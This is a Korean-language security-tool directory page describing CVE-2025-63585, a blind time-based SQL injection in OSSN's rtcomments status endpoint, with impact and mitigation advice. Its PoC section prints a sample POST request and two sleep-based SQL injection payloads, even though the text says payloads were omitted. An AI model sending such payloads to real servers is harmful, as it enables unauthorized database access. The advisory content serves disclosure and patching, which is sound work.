Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-63585 — OSSN의 /action/rtcomments/status 엔드포인트에서 블라인드 시간 기반 SQL 주입 취약점에 대한 개념 증명으로, timestamp 매개변수를 통한 임의 SQL 실행을 시연합니다. | Kitploit
도구/GitHubGitHub/kgan0509/cve-2025-63585
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingDatabase Security
GitHubkgan0509/cve-2025-63585

CVE-2025-63585

OSSN의 /action/rtcomments/status 엔드포인트에서 블라인드 시간 기반 SQL 주입 취약점에 대한 개념 증명으로, timestamp 매개변수를 통한 임의 SQL 실행을 시연합니다.

저장소 보기
210개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-63585

/action/rtcomments/status의 블라인드 시간 기반 SQL 인젝션 (매개변수: timestamp)

/action/rtcomments/status 엔드포인트의 timestamp 매개변수에서 블라인드 시간 기반 SQL 인젝션 취약점이 발견되었습니다. 이 매개변수를 제공할 수 있는 인증된 공격자는 임의의 SQL 쿼리를 실행하여 민감한 데이터를 노출하거나 수정할 수 있습니다.

영향: 데이터 노출, 데이터 수정, 권한 상승, 시간 지연 쿼리를 통한 잠재적 서비스 거부(DoS), (DB 권한에 따라 다름).

완화 방안: OSSN을 버전 8.9 이상으로 업그레이드하십시오. 또한, 모든 데이터베이스 액세스에 매개변수화된 쿼리/준비된 문(Prepared Statement)을 사용하도록 하고, timestamp 입력을 엄격히 검증하며(예상되는 숫자 또는 ISO 형식만 허용), DB 계정에 최소 권한을 적용하고, 쿼리 시간 제한 및 로깅을 활성화하십시오.

참고: 안전을 위해 익스플로잇 페이로드는 의도적으로 생략되었습니다.

github: https://github.com/opensource-socialnetwork/opensource-socialnetwork/issues/2503

PoC

다음 요청을 POST 메서드로 전송합니다: '/action/rtcomments/status?guid=18&type=post&ossn_ts=1759741100&ossn_token=c3901a321e755ea3e9956e79eb0fbc7e674f80665725774738b93324699c7c28'

Payload: timestamp=(select*from(select(sleep(10)))a) image

Payload: timestamp=(select*from(select(sleep(30)))a) image

도구 다운로드